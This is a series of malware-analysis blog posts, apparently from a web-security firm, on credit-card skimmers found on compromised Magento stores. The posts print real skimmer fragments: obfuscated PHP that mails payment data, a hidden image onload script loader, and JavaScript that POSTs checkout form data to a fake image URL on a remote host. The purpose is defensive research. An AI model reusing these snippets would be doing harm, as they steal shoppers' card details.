Category: Magento Security

KOSONG Credit Card Stealer

Our security analyst Christopher Morrow recently discovered a server-side Magento skimmer that was injected into the savePayment function in the app/code/core/Mage/Checkout/Model/Type/Onepage.php file.

Skimmer in Onepage.php

This code emails payment details to "reachead@yandex[.]com", then sends them to a script on a remote server: "hxxps://smartxenons[.]co.uk//new/img/Opage.php".

While you can clearly see the curl request to the malicious URL, both the email address and the code responsible for sending the email are obfuscated:

$idkey = "base"."64"."_"."de"."code";
        $update = "ma"."il"";
        $encsrv = $idkey("cmVhY2hlYWRAeWFuZGV4LmNvbQ==");  
        $update($encsrv, $subject, $datasend, $ipcid);
        $update($encsrv, $subject, $xupdate, $ipcid);

Although the attackers use the Russian Yandex service to receive the emails, I suspect they are most likely from either Indonesia or Malaysia. The malware uses the words "KOSONG" as a placeholder for missing payment details. In Indonesian and Malay languages this word means "empty" or "blank".

Aug 12, 2019 by Denis Sinegubko

CC Stealing code pretending to be Bing ads.

During a recent investigation we found this suspicious code pretending to be associated with Bing ads.After further review, we see that the code is actually injecting JavaScript from “js-mini[.]com”.The injected code is then used to capture credit card information on Magento sites and sending it to the same domain.

Here is some of the code that was loading from js-mini[.]com/ajax/libs/jquery-1.1.2.js:

You can see that the code is harvesting the login credentials and attempting to send the data to an external destination.

This code was found in the database of a Magento site under core_config_data.value, config_id = 40

It’s unknown how many credentials were harvested by this malware, but you can see how malware can be heavily obfuscated and made to look like legitimate code. If ignored, this code could have kept stealing personal data from people shopping online. We recommend making sure that your ecommerce site is up to date on all of its patches and look for any code loading from external sources, as this could be a sign of malware.

Jun 20, 2019 by Krasimir Konov

Images Loading Credit Card Swipers

We’ve come across an interesting approach to injecting credit card swipers into Magento web pages.

Instead of injecting a real script, attackers insert a seemingly benign, invisible image from the same site. The catch is, the tag has an "onload" event handler that loads the malicious script.

The injected HTML code looks like this:

<span style="display:none;"><img src="https://www.<redacted>.com/media/wysiwyg/infortis/ultimo/icons/info.png"  onload="var  o=document.createElement('script');o.src=atob('Ly9jb2xkanMuY29tL2Nk...redacted...2MmZpdw==');var   s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(o,  s);"></span>

It is comprised of a tag with the "display:none;" style, which makes the image invisible, and an tag that loads some legitimate image from the compromised site (which makes it look less suspicious). The onload handler creates a new script element with a base64-encoded src parameter (decoded by atob.)

In the above example, the decoded src ( coldjs[.]com/cdn/dnb36346262fiw) is a URL of a credit card stealing script.

Customization

The attackers took the time to customize this malware for every compromised site. Not only do they pick real images from the victim’s site but also use different domains for the loaded scripts.

Here are just a few of the domains used by this campaign:

    monsterengy[.]com - creation date: 2018-10-12
    cosrcmax[.]com - creation date: 2018-10-31
    jschef[.]com - creation date: 2019-01-16
    googietagmanagar[.]com - creation date: 2019-03-10
    cubejs[.]com - creation date: 2019-03-13
    coldjs[.]com - creation date: 2019-03-13

The script paths are also individualized. They contain parts of the second-level domain (SLD) names of the victims sites.

    /<SLD>
    /www.<SLD>.com
    /cdn/<part-of-SLD>36346262fiw
    /cdn/<SLD>/4879465
    /<part-of-SLD>/502osja66ds.js

Given their random nature and occasional typos, we can assume that they are generated manually.

On sites that we cleaned, the malware was injected into the header template of the core_config_data table.

May 10, 2019 by Denis Sinegubko

Magento CC stealer reinfector

We have seen many times in the past few months how attackers are infecting Magento installations to scrape confidential information such as credit cards, logins, and PayPal credentials, but we haven’t approached the methods that they use to ensure that their malicious code is added back, if removed.


Here’s a code we found on /includes/config.php. This is a prime candidate for infections once it is included right on the main index.php so that it loads at every page:

A default config.php file should not be changed by the site owner directly, all the code is added by Magento itself, seeing this code on the file already triggers a warning.

On the first block we have a function called “patch” that writes content into a file (patching it). This function is then called to write externally obtained content and write it into specific files related to the payment process or user control:

/app/code/core/Mage/Payment/Model/Method/Cc.php

/app/code/core/Mage/Payment/Model/Method/Abstract.php

/app/code/core/Mage/Customer/controllers/AccountController.php

/app/code/core/Mage/Customer/controllers/AddressController.php

/app/code/core/Mage/Admin/Model/Session.php

/app/code/core/Mage/Admin/Model/Config.php

/app/code/core/Mage/Checkout/Model/Type/Onepage.php

/app/code/core/Mage/Checkout/Model/Type/Abstract.php

The malicious code also obfuscates external links in a way that a simple variable replacement and base64 decoding can read it, but it makes less obvious for the untrained eye, such as:

$link_a = $link.'YTGgAnrv';

Convert to:

$link_a = 'hxxp://pastebin[.]com/raw/YTGgAnrv';&nbsp

It's not the first time that there’s malicious code being stored on pastebin which is then directly used by attackers to keep their infections more “low-profile” to make their detection harder.

Looking at all the content stored on pastebin[.]com, I found very common variations of malware that intend to steal passwords and credit card information then send them off to external domains for processing or sale such as:

hxxp://magento.ontools[.]net/update

hxxp://www.bgsvetlina[.[com/post.php

The code is pretty similar to other ones we previously approached:

https://labs.sucuri.net/?note=2016/12/13 0:00

https://labs.sucuri.net/?note=2016/11/03 0:00

https://labs.sucuri.net/?note=2016/05/25 0:00

Two interesting facts is the mechanism that the attackers add “error_reporting(0);” to avoid any error leading to the discovery of the infection and that the size of each of the files is verified to check if its necessary to reinfect them again.

As a rule of thumb on every Magento installation where a compromise is suspected to have taken place, the /includes/config.php should be verified straight on (I know I do it first thing). 

Removing just the infection that you have a main concern about many times does not suffice to clear your mind. You should always assume someone is out to get you and that they are still inside your website, so looking for other kinds of malware and backdoors is imperative.

For Magento infections like this, you can use our step-by-step guide on how to identify a hack and clean a compromised Magento site. Otherwise, feel free to get in touch and we’ll get you back to tip top shape in no time.

Jun 8, 2018 by Cesar Anjos

When Online Shopping leads to Malware download

Recently, during an incident response process, we worked on an interesting Magento website. This site was reported to having a strange redirection when users visited the site. Without further ado, we started investigating the issue on this site.


The site loaded pretty slow on our end, which didn’t look right. There was something holding the site back. After further checking, we found a JavaScript include with suspicious URL on the page source as below:

<script type="text/javascript" src=" hXXp://aleinvest[.]xyz/js/js"></script>

We discovered that this is a conditional URL where on the first check, we could see a JavaScript code, but on the next check the code wouldn’t display anymore. Luckily we saved the JavaScript code firsthand and it redirected the user to download an executable file named ‘plugin.exe’ from a dropbox shared link as below: 

function process() { window.location = "hXXps://www.dropbox[.]com/<snipped>/plugin.exe?dl=1"; } window.onerror = process; process()

We were able to download the ‘plugin.exe’ file (SHA256: 21f453cc5885ca7fbbb94bb0e54158c11c043318c794f7266158e7bb00190080) and quickly uploaded it to VirusTotal to get an overview of the threat. VirusTotal gives 34/59 detection ratio for this file which shows pretty clearly that it is a malware file.

Since we confirmed on the malicious component, we went back to the site infrastructure to find its source. It wasn’t long before we figured out that the JavaScript include had been stored inside Magento database on core_config_data table as shown on screenshot below;

Right after the piece of code was removed from the database, the site started loading way faster than before. Luckily the site hasn’t been flagged nor blacklisted by Google, so we could skip the blacklist removal request procedure for now.

Searching a bit on Google for this similar threat, there are just a few infections related to this one for now, but all of them are related to Magento websites.

If you look into our previous labs notes related to Magento sites, most of the threats are heavily associated with credit card stealers. Fret not! Whether it is credit card stealers, blackhat SEO, or even malware redirects, let us know if you want professional security help. We are here to secure and protect your Magento website!

Aug 28, 2017 by Ahmad Azizan

Database and Image Tricks in Magento Malware

Magento malware that steals details of customer credit cards is a prevalent problem during the last couple of years. We write a lot about various modifications of such malware and the tricks hackers use. When you look back, it’s interesting to see how common ideas may be reused in different steps of the attack.


Database

It’s a common trick to inject malware directly into the Magento database, which helps avoid modification of files on the server. The most typical target is the design/head/includes rows of the core_config_data table. The HTML code from those records is used to build the site pages, so it’s a perfect place for injection of JavaScript code that monitors form input and sends entered data to third-party servers.

Images

Another common theme is using image files to transfer stolen data. Since 2015 (the notorious Visbot malware), we’ve seen many different variations of the server-side malware that would save stolen data in files with image extensions (.jpg, .png, .gif). Files with such extensions raise little suspicion since they are not executable. At the same time, they can be easily downloaded from the compromised sites. Some malware saved the data in plain text. More complex attacks appended the data to existing legitimate image files. Visbot and its "Fake SUPEE-5344 Patch" modification used public keys to encrypt the saved in the .jpg files data, which also helped them make the files look like real binary images.

The "Fake SUPEE-5344 Patch" malware also had a backdoor functionality. It executed arbitrary shell commands passed in the “jpg” request parameter. Apparently, everything related to images is considered benign. Another JavaScript malware sends stolen data to a third-party server, but instead of making a direct AJAX call to that remote URL, it builds an <img> tag with that remote URL as its src parameter. The result is the same, but now it looks as if it’s loading an image from a remote server, not sending data to a remote server.

Recently, we came across a combination of all the above tricks. An obfuscated script was found in the design/footer/absolute_footer row of the core_config_data table.

<script>
this["eval"]("%:){(-7{^-&//`\n5&-8\'2,-{(\':)\'sr \n{{...skipped
...String(A).split("").reverse().join("");return H.charAt(A.indexOf(W))}));
</script>

Once decoded, it was clear that it steals data from Magento checkout pages

if((new RegExp('onepagecheckout|onestepcheckout|onepage|firecheckout|simplecheckout')).test(window.location)) { ...

And sends it to a remote hacked site:

...
if(cc.test(snd)){ asd="1" ; } 
var http = new XMLHttpRequest(); 
http.open("POST","https://<hacked-site>/lib/paypal_icon.jpg",true); 
http.setRequestHeader("Content-type","application/x-www-form-urlencoded"); 
http.send("data="+snd+"&asd="+asd+"&id_id=infected-site.com"); 
...

The URL of the remote script looks like a URL of an image file: https:///lib/paypal_icon.jpg. One might think that the script loads a PayPal icon for the checkout page. Of course it makes little sense. And when you notice that the script uses the POST method to open that “image” and passes form data as parameters, it becomes clear that paypal_icon.jpg is not an image - it’s a server-side script that pretends to be an image (most likely either using using .htaccess tricks like mod_rewrite or changing the handler and MIME type for the .jpg extension inside the /lib directory).

This malware reminds us once again that we should not trust any code, requests, or files just because they are related (or seem to be related) to images. And don’t limit your malware scans to files on server. Most modern CMS can’t work without a database and the databases are a common target for infections.

For more information about security issues of Magento and other ecommerce platforms, please check the Ecommerce security section of our blog. If you need someone to clean and protect your site, you can count on us.

Jan 10, 2017 by Denis Sinegubko